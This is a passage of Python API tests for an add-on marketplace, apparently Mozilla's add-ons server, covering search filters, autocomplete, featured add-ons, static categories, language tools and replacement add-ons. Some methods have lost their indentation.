        result = data['results'][0]
        assert result['id'] == addon2.pk
        assert result['slug'] == addon2.slug
        assert result['tags'] == ['some_tag', 'unique_tag']
def test_bad_filter(self):
data = self.perform_search(
self.url, {'app': 'lol'}, expected_status=400)
assert data == ['Invalid "app" parameter.']
def test_filter_by_author(self):
author = user_factory(username=u'my-fancyAuthôr')
addon = addon_factory(slug='my-addon', name=u'My Addôn',
tags=['some_tag'], weekly_downloads=999)
AddonUser.objects.create(addon=addon, user=author)
addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
tags=['unique_tag', 'some_tag'],
weekly_downloads=333)
author2 = user_factory(username=u'my-FancyAuthôrName')
AddonUser.objects.create(addon=addon2, user=author2)
self.reindex(Addon)
data = self.perform_search(self.url, {'author': u'my-fancyAuthôr'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
    def test_filter_by_multiple_authors(self):
        """A comma-separated ?author= list matches add-ons by ANY of the
        given authors (OR semantics); unrelated authors are excluded."""
        author = user_factory(username='foo')
        author2 = user_factory(username='bar')
        another_author = user_factory(username='someoneelse')
        addon = addon_factory(slug='my-addon', name=u'My Addôn',
                              tags=['some_tag'], weekly_downloads=999)
        AddonUser.objects.create(addon=addon, user=author)
        AddonUser.objects.create(addon=addon, user=author2)
        addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
                               tags=['unique_tag', 'some_tag'],
                               weekly_downloads=333)
        AddonUser.objects.create(addon=addon2, user=author2)
        # Owned by neither 'foo' nor 'bar', so it must not show up.
        another_addon = addon_factory()
        AddonUser.objects.create(addon=another_addon, user=another_author)
        self.reindex(Addon)
        data = self.perform_search(self.url, {'author': u'foo,bar'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        result = data['results'][0]
        assert result['id'] == addon.pk
        assert result['slug'] == addon.slug
        result = data['results'][1]
        assert result['id'] == addon2.pk
        assert result['slug'] == addon2.slug
def test_filter_by_guid(self):
addon = addon_factory(slug='my-addon', name=u'My Addôn',
guid='random@guid', weekly_downloads=999)
addon_factory()
self.reindex(Addon)
data = self.perform_search(self.url, {'guid': u'random@guid'})
assert data['count'] == 1
assert len(data['results']) == 1
result = data['results'][0]
assert result['id'] == addon.pk
assert result['slug'] == addon.slug
    def test_filter_by_multiple_guid(self):
        """A comma-separated ?guid= list matches all listed guids; guids
        that do not exist (or are not even guid-shaped) are ignored."""
        addon = addon_factory(slug='my-addon', name=u'My Addôn',
                              guid='random@guid', weekly_downloads=999)
        addon2 = addon_factory(slug='another-addon', name=u'Another Addôn',
                               guid='random2@guid',
                               weekly_downloads=333)
        addon_factory()
        self.reindex(Addon)
        data = self.perform_search(
            self.url, {'guid': u'random@guid,random2@guid'})
        assert data['count'] == 2
        assert len(data['results']) == 2
        result = data['results'][0]
        assert result['id'] == addon.pk
        assert result['slug'] == addon.slug
        result = data['results'][1]
        assert result['id'] == addon2.pk
        assert result['slug'] == addon2.slug
        # Throw in some random invalid guids too that will be ignored.
        data = self.perform_search(
            self.url, {
                'guid': u'random@guid,invalid@guid,notevenaguid$,random2@guid'}
        )
        assert data['count'] == len(data['results']) == 2
        assert data['results'][0]['id'] == addon.pk
        assert data['results'][1]['id'] == addon2.pk
    def test_find_addon_default_non_en_us(self):
        """An add-on whose default_locale is not en-US is still findable by
        its default-locale name, whatever ?lang= the request uses."""
        with self.activate('en-GB'):
            addon = addon_factory(
                status=amo.STATUS_PUBLIC,
                type=amo.ADDON_EXTENSION,
                default_locale='en-GB',
                name='Banana Bonkers',
                description=u'Let your browser eat your bananas',
                summary=u'Banana Summary',
            )
            # Add Spanish translations on top of the en-GB defaults.
            addon.name = {'es': u'Banana Bonkers espanole'}
            addon.description = {
                'es': u'Deje que su navegador coma sus plátanos'}
            addon.summary = {'es': u'resumen banana'}
            addon.save()
        addon_factory(
            slug='English Addon', name=u'My English Addôn')
        self.reindex(Addon)
        for locale in ('en-US', 'en-GB', 'es'):
            with self.activate(locale):
                url = reverse_ns('addon-search')
                data = self.perform_search(url, {'lang': locale})
                assert data['count'] == 2
                assert len(data['results']) == 2
                # Querying by the en-GB name works in every locale.
                data = self.perform_search(
                    url, {'q': 'Banana', 'lang': locale})
                result = data['results'][0]
                assert result['id'] == addon.pk
                assert result['slug'] == addon.slug
    def test_exclude_addons(self):
        """?exclude_addons= removes add-ons from the results; entries may be
        slugs, pks, or a mix of both in the same comma-separated list."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        addon3 = addon_factory()
        self.refresh()
        # Exclude addon2 and addon3 by slug.
        data = self.perform_search(
            self.url, {'exclude_addons': u','.join(
                (addon2.slug, addon3.slug))})
        assert len(data['results']) == 1
        assert data['count'] == 1
        assert data['results'][0]['id'] == addon1.pk
        # Exclude addon1 and addon2 by pk.
        data = self.perform_search(
            self.url, {'exclude_addons': u','.join(
                map(unicode, (addon2.pk, addon1.pk)))})
        assert len(data['results']) == 1
        assert data['count'] == 1
        assert data['results'][0]['id'] == addon3.pk
        # Exclude addon1 by pk and addon3 by slug.
        data = self.perform_search(
            self.url, {'exclude_addons': u','.join(
                (unicode(addon1.pk), addon3.slug))})
        assert len(data['results']) == 1
        assert data['count'] == 1
        assert data['results'][0]['id'] == addon2.pk
    def test_filter_fuzziness(self):
        """Fuzzy matching tolerates a typo ('Taschenmssser') but only after
        the first characters, which are matched exactly."""
        with self.activate('de'):
            addon = addon_factory(slug='my-addon', name={
                'de': 'Mein Taschenmesser'
            }, default_locale='de')
            # Won't get matched, we have a prefix length of 4 so that
            # the first 4 characters are not analyzed for fuzziness
            addon_factory(slug='my-addon2', name={
                'de': u'Mein Hufrinnenmesser'
            }, default_locale='de')
        self.refresh()
        with self.activate('de'):
            data = self.perform_search(self.url, {'q': 'Taschenmssser'})
        assert data['count'] == 1
        assert len(data['results']) == 1
        assert data['results'][0]['id'] == addon.pk
    def test_prevent_too_complex_to_determinize_exception(self):
        """A long unicode-heavy query must return 0 results, not a 500."""
        # too_complex_to_determinize_exception happens in elasticsearch when
        # we do a fuzzy query with a query string that is well, too complex,
        # with specific unicode chars and too long. For this reason we
        # deactivate fuzzy matching if the query is over 20 chars. This test
        # contain a string that was causing such breakage before.
        # Populate the index with a few add-ons first (enough to trigger the
        # issue locally).
        for i in range(0, 10):
            addon_factory()
        self.refresh()
        query = (u'남포역립카페추천 ˇjjtat닷컴ˇ ≡제이제이♠♣ 남포역스파 '
                 u'남포역op남포역유흥≡남포역안마남포역오피 ♠♣')
        data = self.perform_search(self.url, {'q': query})
        # No results, but no 500 either.
        assert data['count'] == 0
class TestAddonAutoCompleteSearchView(ESTestCase):
    """Tests for the add-on autocomplete endpoint (Elasticsearch-backed).

    Unlike the full search endpoint, autocomplete responses carry no
    pagination metadata ('count'/'next'/'prev') and are capped at 10
    results (see test_pagination).
    """
    client_class = APITestClient
    fixtures = ['base/users']
    def setUp(self):
        super(TestAddonAutoCompleteSearchView, self).setUp()
        self.url = reverse_ns('addon-autocomplete')
    def tearDown(self):
        super(TestAddonAutoCompleteSearchView, self).tearDown()
        self.empty_index('default')
        self.refresh()
    def perform_search(self, url, data=None, expected_status=200, **headers):
        """GET `url`, assert status and that no SQL query was issued, and
        return the parsed JSON body."""
        # Just to cache the waffle switch, to avoid polluting the
        # assertNumQueries() call later.
        waffle.switch_is_active('boost-webextensions-in-search')
        with self.assertNumQueries(0):
            response = self.client.get(url, data, **headers)
        assert response.status_code == expected_status
        data = json.loads(response.content)
        return data
    def test_basic(self):
        """A name-prefix query returns matching add-ons only."""
        addon = addon_factory(slug='my-addon', name=u'My Addôn')
        addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn')
        addon_factory(slug='nonsense', name=u'Nope Nope Nope')
        self.refresh()
        data = self.perform_search(self.url, {'q': 'my'})  # No db query.
        assert 'count' not in data
        assert 'next' not in data
        assert 'prev' not in data
        assert len(data['results']) == 2
        assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk}
    def test_type(self):
        """?type= accepts a comma-separated list and filters results."""
        addon = addon_factory(
            slug='my-addon', name=u'My Addôn', type=amo.ADDON_EXTENSION)
        addon2 = addon_factory(
            slug='my-second-addon', name=u'My second Addôn',
            type=amo.ADDON_PERSONA)
        addon_factory(slug='nonsense', name=u'Nope Nope Nope')
        addon_factory(
            slug='whocares', name=u'My xul theme', type=amo.ADDON_THEME)
        self.refresh()
        data = self.perform_search(
            self.url, {'q': 'my', 'type': 'persona,extension'})  # No db query.
        assert 'count' not in data
        assert 'next' not in data
        assert 'prev' not in data
        assert len(data['results']) == 2
        assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk}
    def test_default_locale_fallback_still_works_for_translations(self):
        """Requesting a locale with no translation falls back to the
        add-on's default_locale for the name."""
        addon = addon_factory(default_locale='pt-BR', name='foobar')
        # Couple quick checks to make sure the add-on is in the right state
        # before testing.
        assert addon.default_locale == 'pt-BR'
        assert addon.name.locale == 'pt-br'
        self.refresh()
        # Search in a different language than the one used for the name: we
        # should fall back to default_locale and find the translation.
        data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'fr'})
        assert data['results'][0]['name'] == 'foobar'
        # Same deal in en-US.
        data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'en-US'})
        assert data['results'][0]['name'] == 'foobar'
    def test_empty(self):
        """No query parameters yields an empty, unpaginated result list."""
        data = self.perform_search(self.url)
        assert 'count' not in data
        assert len(data['results']) == 0
    def test_get_queryset_excludes(self):
        """The ES queryset only fetches the fields autocomplete needs."""
        addon_factory(slug='my-addon', name=u'My Addôn',
                      weekly_downloads=666)
        addon_factory(slug='my-persona', name=u'My Persona',
                      type=amo.ADDON_PERSONA)
        self.refresh()
        view = AddonAutoCompleteSearchView()
        view.request = APIRequestFactory().get('/')
        qset = view.get_queryset()
        includes = set((
            'default_locale', 'icon_type', 'id', 'modified',
            'name_translations', 'persona', 'slug', 'type'))
        assert set(qset.to_dict()['_source']['includes']) == includes
        response = qset.execute()
        # Sort by type to avoid sorting problems before picking the
        # first result. (We have a theme and an add-on)
        hit = sorted(response.hits.hits, key=lambda x: x['_source']['type'])
        assert set(hit[1]['_source'].keys()) == includes
    def test_no_unlisted(self):
        """Add-ons with only unlisted versions never show up."""
        addon_factory(slug='my-addon', name=u'My Addôn',
                      status=amo.STATUS_NULL,
                      weekly_downloads=666,
                      version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
        self.refresh()
        data = self.perform_search(self.url)
        assert 'count' not in data
        assert len(data['results']) == 0
    def test_pagination(self):
        """Results are hard-capped at 10; ?page_size= is ignored."""
        [addon_factory() for x in range(0, 11)]
        self.refresh()
        # page_size should be ignored, we should get 10 results.
        data = self.perform_search(self.url, {'page_size': 1})
        assert 'count' not in data
        assert 'next' not in data
        assert 'prev' not in data
        assert len(data['results']) == 10
class TestAddonFeaturedView(TestCase):
    """Tests for the featured add-ons endpoint.

    The id-selection helpers (get_featured_ids / get_creatured_ids) are
    mocked out, so these tests assert the parameters forwarded to them and
    the shape of the response, not the selection logic itself.
    """
    client_class = APITestClient
    def setUp(self):
        self.url = reverse_ns('addon-featured')
    def test_no_parameters(self):
        """A request with no parameters at all is rejected with a 400."""
        response = self.client.get(self.url)
        assert response.status_code == 400
        assert json.loads(response.content) == {
            'detail': 'Invalid app, category and/or type parameter(s).'}
    @patch('olympia.addons.views.get_featured_ids')
    def test_app_only(self, get_featured_ids_mock):
        """?app= alone calls get_featured_ids(app, types=None, lang=None)."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {'app': 'firefox'})
        assert get_featured_ids_mock.call_count == 1
        assert (get_featured_ids_mock.call_args_list[0][0][0] ==
                amo.FIREFOX)  # app
        assert (get_featured_ids_mock.call_args_list[0][1] ==
                {'types': None, 'lang': None})
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    @patch('olympia.addons.views.get_featured_ids')
    def test_app_and_type(self, get_featured_ids_mock):
        """A single ?type= is translated into a one-element types list."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'app': 'firefox', 'type': 'extension'
        })
        assert get_featured_ids_mock.call_count == 1
        assert (get_featured_ids_mock.call_args_list[0][0][0] ==
                amo.FIREFOX)  # app
        assert (get_featured_ids_mock.call_args_list[0][1] ==
                {'types': [amo.ADDON_EXTENSION], 'lang': None})
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    @patch('olympia.addons.views.get_featured_ids')
    def test_app_and_types(self, get_featured_ids_mock):
        """A comma-separated ?type= becomes a multi-element types list."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'app': 'firefox', 'type': 'extension,theme'
        })
        assert get_featured_ids_mock.call_count == 1
        assert (get_featured_ids_mock.call_args_list[0][0][0] ==
                amo.FIREFOX)  # app
        assert (get_featured_ids_mock.call_args_list[0][1] ==
                {'types': [amo.ADDON_EXTENSION, amo.ADDON_THEME],
                 'lang': None})
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    @patch('olympia.addons.views.get_featured_ids')
    def test_app_and_type_and_lang(self, get_featured_ids_mock):
        """?lang= is forwarded verbatim to get_featured_ids."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_featured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'app': 'firefox', 'type': 'extension', 'lang': 'es'
        })
        assert get_featured_ids_mock.call_count == 1
        assert (get_featured_ids_mock.call_args_list[0][0][0] ==
                amo.FIREFOX)  # app
        assert (get_featured_ids_mock.call_args_list[0][1] ==
                {'types': [amo.ADDON_EXTENSION], 'lang': 'es'})
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    def test_invalid_app(self):
        """An unknown app is rejected with a 400."""
        response = self.client.get(
            self.url, {'app': 'foxeh', 'type': 'extension'})
        assert response.status_code == 400
        assert json.loads(response.content) == {
            'detail': 'Invalid app, category and/or type parameter(s).'}
    def test_invalid_type(self):
        """An unknown type is rejected with a 400."""
        response = self.client.get(self.url, {'app': 'firefox', 'type': 'lol'})
        assert response.status_code == 400
        assert json.loads(response.content) == {
            'detail': 'Invalid app, category and/or type parameter(s).'}
    def test_category_no_app_or_type(self):
        """?category= without app and type is rejected with a 400."""
        response = self.client.get(self.url, {'category': 'lol'})
        assert response.status_code == 400
        assert json.loads(response.content) == {
            'detail': 'Invalid app, category and/or type parameter(s).'}
    def test_invalid_category(self):
        """An unknown category slug is rejected with a 400."""
        response = self.client.get(self.url, {
            'category': 'lol', 'app': 'firefox', 'type': 'extension'
        })
        assert response.status_code == 400
        assert json.loads(response.content) == {
            'detail': 'Invalid app, category and/or type parameter(s).'}
    @patch('olympia.addons.views.get_creatured_ids')
    def test_category(self, get_creatured_ids_mock):
        """With a category, get_creatured_ids is used instead of
        get_featured_ids, called with (category_id, lang)."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'category': 'alerts-updates', 'app': 'firefox', 'type': 'extension'
        })
        assert get_creatured_ids_mock.call_count == 1
        assert get_creatured_ids_mock.call_args_list[0][0][0] == 72  # category
        assert get_creatured_ids_mock.call_args_list[0][0][1] is None  # lang
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    @patch('olympia.addons.views.get_creatured_ids')
    def test_category_with_multiple_types(self, get_creatured_ids_mock):
        """A category slug spanning two types triggers one
        get_creatured_ids call per matching category id."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'category': 'nature', 'app': 'firefox',
            'type': 'persona,statictheme'
        })
        assert get_creatured_ids_mock.call_count == 2
        assert get_creatured_ids_mock.call_args_list[0][0][0] == 102  # cat
        assert get_creatured_ids_mock.call_args_list[0][0][1] is None  # lang
        assert get_creatured_ids_mock.call_args_list[1][0][0] == 302  # cat
        assert get_creatured_ids_mock.call_args_list[1][0][1] is None  # lang
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
    @patch('olympia.addons.views.get_creatured_ids')
    def test_category_with_lang(self, get_creatured_ids_mock):
        """?lang= is forwarded as the second positional argument."""
        addon1 = addon_factory()
        addon2 = addon_factory()
        get_creatured_ids_mock.return_value = [addon1.pk, addon2.pk]
        response = self.client.get(self.url, {
            'category': 'alerts-updates', 'app': 'firefox',
            'type': 'extension', 'lang': 'fr',
        })
        assert get_creatured_ids_mock.call_count == 1
        assert get_creatured_ids_mock.call_args_list[0][0][0] == 72  # cat id.
        assert get_creatured_ids_mock.call_args_list[0][0][1] == 'fr'  # lang
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data['results']
        assert len(data['results']) == 2
        assert data['results'][0]['id'] == addon1.pk
        assert data['results'][1]['id'] == addon2.pk
class TestStaticCategoryView(TestCase):
    """Tests for the category list endpoint, which is served entirely from
    the static CATEGORIES data (zero SQL queries)."""
    client_class = APITestClient
    def setUp(self):
        super(TestStaticCategoryView, self).setUp()
        self.url = reverse_ns('category-list')
    def test_basic(self):
        """The full category list is returned without touching the db."""
        with self.assertNumQueries(0):
            response = self.client.get(self.url)
        assert response.status_code == 200
        data = json.loads(response.content)
        assert len(data) == 113
        # some basic checks to verify integrity
        entry = data[0]
        assert entry == {
            u'name': u'Feeds, News & Blogging',
            u'weight': 0,
            u'misc': False,
            u'id': 1,
            u'application': u'firefox',
            u'description': None,
            u'type': u'extension',
            u'slug': u'feeds-news-blogging'
        }
    def test_with_description(self):
        """A category description set on the static data is serialized."""
        # StaticCategory is immutable, so avoid calling its __setattr__
        # directly.
        object.__setattr__(CATEGORIES_BY_ID[1], 'description', u'does stuff')
        with self.assertNumQueries(0):
            response = self.client.get(self.url)
        assert response.status_code == 200
        data = json.loads(response.content)
        assert len(data) == 113
        # some basic checks to verify integrity
        entry = data[0]
        assert entry == {
            u'name': u'Feeds, News & Blogging',
            u'weight': 0,
            u'misc': False,
            u'id': 1,
            u'application': u'firefox',
            u'description': u'does stuff',
            u'type': u'extension',
            u'slug': u'feeds-news-blogging'
        }
    @pytest.mark.needs_locales_compilation
    def test_name_translated(self):
        """Category names honor the Accept-Language header."""
        with self.assertNumQueries(0):
            response = self.client.get(self.url, HTTP_ACCEPT_LANGUAGE='de')
        assert response.status_code == 200
        data = json.loads(response.content)
        assert data[0]['name'] == 'RSS-Feeds, Nachrichten & Bloggen'
    def test_cache_control(self):
        """Responses are cacheable for 6 hours (21600 seconds)."""
        response = self.client.get(self.url)
        assert response.status_code == 200
        assert response['cache-control'] == 'max-age=21600'
class TestLanguageToolsView(TestCase):
client_class = APITestClient
def setUp(self):
super(TestLanguageToolsView, self).setUp()
self.url = reverse_ns('addon-language-tools')
def test_wrong_app_or_no_app(self):
response = self.client.get(self.url)
assert response.status_code == 400
assert response.data == {
'detail': u'Invalid or missing app parameter.'}
response = self.client.get(self.url, {'app': 'foo'})
assert response.status_code == 400
assert response.data == {
'detail': u'Invalid or missing app parameter.'}
def test_basic(self):
dictionary = addon_factory(type=amo.ADDON_DICT, target_locale='fr')
dictionary_spelling_variant = addon_factory(
type=amo.ADDON_DICT, target_locale='fr',
locale_disambiguation='For spelling reform')
language_pack = addon_factory(
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
# These add-ons below should be ignored: they are either not public or
# of the wrong type, not supporting the app we care about, or their
# target locale is empty.
addon_factory(
type=amo.ADDON_LPAPP, target_locale='de',
version_kw={'application': amo.THUNDERBIRD.id})
addon_factory(
type=amo.ADDON_DICT, target_locale='fr',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED})
addon_factory(
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'status': amo.STATUS_AWAITING_REVIEW},
status=amo.STATUS_NOMINATED)
addon_factory(type=amo.ADDON_DICT, target_locale='')
addon_factory(type=amo.ADDON_LPAPP, target_locale=None)
addon_factory(target_locale='fr')
response = self.client.get(self.url, {'app': 'firefox'})
assert response.status_code == 200
data = json.loads(response.content)
assert len(data['results']) == 3
expected = [dictionary, dictionary_spelling_variant, language_pack]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
assert 'locale_disambiguation' in data['results'][0]
assert 'target_locale' in data['results'][0]
# We were not filtering by appversion, so we do not get the
# current_compatible_version property.
assert 'current_compatible_version' not in data['results'][0]
def test_with_appversion_but_no_type(self):
response = self.client.get(
self.url, {'app': 'firefox', 'appversion': '57.0'})
assert response.status_code == 400
assert response.data == {
'detail': 'Invalid or missing type parameter while appversion '
'parameter is set.'}
def test_with_invalid_appversion(self):
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language', 'appversion': u'foôbar'})
assert response.status_code == 400
assert response.data == {'detail': 'Invalid appversion parameter.'}
def test_with_author_filtering(self):
user = user_factory(username=u'mozillä')
addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de')
addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr')
AddonUser.objects.create(addon=addon1, user=user)
AddonUser.objects.create(addon=addon2, user=user)
# These 2 should not show up: it's either not the right author, or
# the author is not listed.
addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
AddonUser.objects.create(addon=addon3, user=user, listed=False)
addon_factory(type=amo.ADDON_LPAPP, target_locale='it')
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language', 'author': u'mozillä'})
assert response.status_code == 200
data = json.loads(response.content)
expected = [addon1, addon2]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
def test_with_multiple_authors_filtering(self):
user1 = user_factory(username=u'mozillä')
user2 = user_factory(username=u'firefôx')
addon1 = addon_factory(type=amo.ADDON_LPAPP, target_locale='de')
addon2 = addon_factory(type=amo.ADDON_LPAPP, target_locale='fr')
AddonUser.objects.create(addon=addon1, user=user1)
AddonUser.objects.create(addon=addon2, user=user2)
# These 2 should not show up: it's either not the right author, or
# the author is not listed.
addon3 = addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
AddonUser.objects.create(addon=addon3, user=user1, listed=False)
addon_factory(type=amo.ADDON_LPAPP, target_locale='it')
response = self.client.get(
self.url,
{'app': 'firefox', 'type': 'language',
'author': u'mozillä,firefôx'})
assert response.status_code == 200
data = json.loads(response.content)
expected = [addon1, addon2]
assert len(data['results']) == len(expected)
assert (
set(item['id'] for item in data['results']) ==
set(item.pk for item in expected))
def test_with_appversion_filtering(self):
# Add compatible add-ons. We're going to request language packs
# compatible with 58.0.
compatible_pack1 = addon_factory(
name='Spanish Language Pack',
type=amo.ADDON_LPAPP, target_locale='es',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
compatible_pack1.current_version.update(created=self.days_ago(2))
compatible_version1 = version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
compatible_version1.update(created=self.days_ago(1))
compatible_pack2 = addon_factory(
name='French Language Pack',
type=amo.ADDON_LPAPP, target_locale='fr',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '58.0', 'max_app_version': '58.*'})
compatible_version2 = compatible_pack2.current_version
compatible_version2.update(created=self.days_ago(1))
version_factory(
addon=compatible_pack2, file_kw={'strict_compatibility': True},
min_app_version='59.0', max_app_version='59.*')
# Add a more recent version for both add-ons, that would be compatible
# with 58.0, but is not public/listed so should not be returned.
version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*',
channel=amo.RELEASE_CHANNEL_UNLISTED)
version_factory(
addon=compatible_pack2,
file_kw={'strict_compatibility': True,
'status': amo.STATUS_DISABLED},
min_app_version='58.0', max_app_version='58.*')
# And for the first pack, add a couple of versions that are also
# compatible. We should not use them though, because we only need to
# return the latest public version that is compatible.
extra_compatible_version_1 = version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
extra_compatible_version_1.update(created=self.days_ago(3))
extra_compatible_version_2 = version_factory(
addon=compatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='58.0', max_app_version='58.*')
extra_compatible_version_2.update(created=self.days_ago(4))
# Add a few of incompatible add-ons.
incompatible_pack1 = addon_factory(
name='German Language Pack (incompatible with 58.0)',
type=amo.ADDON_LPAPP, target_locale='fr',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '56.0', 'max_app_version': '56.*'})
version_factory(
addon=incompatible_pack1, file_kw={'strict_compatibility': True},
min_app_version='59.0', max_app_version='59.*')
addon_factory(
name='Italian Language Pack (incompatible with 58.0)',
type=amo.ADDON_LPAPP, target_locale='it',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '59.0', 'max_app_version': '59.*'})
addon_factory(
name='Thunderbird Polish Language Pack',
type=amo.ADDON_LPAPP, target_locale='pl',
file_kw={'strict_compatibility': True},
version_kw={
'application': amo.THUNDERBIRD.id,
'min_app_version': '58.0', 'max_app_version': '58.*'})
# Even add a pack with a compatible version... not public. And another
# one with a compatible version... not listed.
incompatible_pack2 = addon_factory(
name='Japanese Language Pack (public, but 58.0 version is not)',
type=amo.ADDON_LPAPP, target_locale='ja',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
version_factory(
addon=incompatible_pack2,
min_app_version='58.0', max_app_version='58.*',
file_kw={'status': amo.STATUS_AWAITING_REVIEW,
'strict_compatibility': True})
incompatible_pack3 = addon_factory(
name='Nederlands Language Pack (58.0 version is unlisted)',
type=amo.ADDON_LPAPP, target_locale='ja',
file_kw={'strict_compatibility': True},
version_kw={'min_app_version': '57.0', 'max_app_version': '57.*'})
version_factory(
addon=incompatible_pack3,
min_app_version='58.0', max_app_version='58.*',
channel=amo.RELEASE_CHANNEL_UNLISTED,
file_kw={'strict_compatibility': True})
# Test it.
with self.assertNumQueries(5):
# 5 queries, regardless of how many add-ons are returned:
# - 1 for the add-ons
# - 1 for the add-ons translations (name)
# - 1 for the compatible versions (through prefetch_related)
# - 1 for the applications versions for those versions
# (we don't need it, but we're using the default Version
# transformer to get the files... this could be improved.)
# - 1 for the files for those versions
response = self.client.get(
self.url,
{'app': 'firefox', 'appversion': '58.0', 'type': 'language',
'lang': 'en-US'})
assert response.status_code == 200, response.content
results = response.data['results']
assert len(results) == 2
# Ordering is not guaranteed by this API, but do check that the
# current_compatible_version returned makes sense.
assert results[0]['current_compatible_version']
assert results[1]['current_compatible_version']
expected_versions = set((
(compatible_pack1.pk, compatible_version1.pk),
(compatible_pack2.pk, compatible_version2.pk),
))
returned_versions = set((
(results[0]['id'], results[0]['current_compatible_version']['id']),
(results[1]['id'], results[1]['current_compatible_version']['id']),
))
assert expected_versions == returned_versions
    def test_memoize(self):
        """The language-tools endpoint response is cached per (app, lang).

        Expects exactly 2 queries on a cold cache, 0 on a warm one, and a
        fresh pair of queries whenever the app or lang parameter changes.
        """
        # Two French dictionaries (one disambiguated), one Spanish langpack,
        # and one German langpack targeting Thunderbird instead of Firefox.
        addon_factory(type=amo.ADDON_DICT, target_locale='fr')
        addon_factory(
            type=amo.ADDON_DICT, target_locale='fr',
            locale_disambiguation='For spelling reform')
        addon_factory(type=amo.ADDON_LPAPP, target_locale='es')
        addon_factory(
            type=amo.ADDON_LPAPP, target_locale='de',
            version_kw={'application': amo.THUNDERBIRD.id})
        with self.assertNumQueries(2):
            response = self.client.get(
                self.url, {'app': 'firefox', 'lang': 'fr'})
        assert response.status_code == 200
        assert len(json.loads(response.content)['results']) == 3
        # Same again, should be cached; no queries.
        with self.assertNumQueries(0):
            assert self.client.get(
                self.url, {'app': 'firefox', 'lang': 'fr'}).content == (
                response.content
            )
        # Different app -> cache miss: queries again and different payload.
        with self.assertNumQueries(2):
            assert (
                self.client.get(
                    self.url, {'app': 'thunderbird', 'lang': 'fr'}).content !=
                response.content
            )
        # Same again, should be cached; no queries.
        with self.assertNumQueries(0):
            self.client.get(self.url, {'app': 'thunderbird', 'lang': 'fr'})
        # Change the lang, we should get queries again.
        with self.assertNumQueries(2):
            self.client.get(self.url, {'app': 'firefox', 'lang': 'de'})
class TestReplacementAddonView(TestCase):
    """Tests for the legacy add-on replacement listing endpoint."""
    client_class = APITestClient

    def test_basic(self):
        # Add a single addon replacement
        rep_addon1 = addon_factory()
        ReplacementAddon.objects.create(
            guid='legacy2addon@moz',
            path=urlunquote(rep_addon1.get_url_path()))
        # Add a collection replacement
        author = user_factory()
        collection = collection_factory(author=author)
        rep_addon2 = addon_factory()
        rep_addon3 = addon_factory()
        collection.set_addons([rep_addon2.id, rep_addon3.id])
        ReplacementAddon.objects.create(
            guid='legacy2collection@moz',
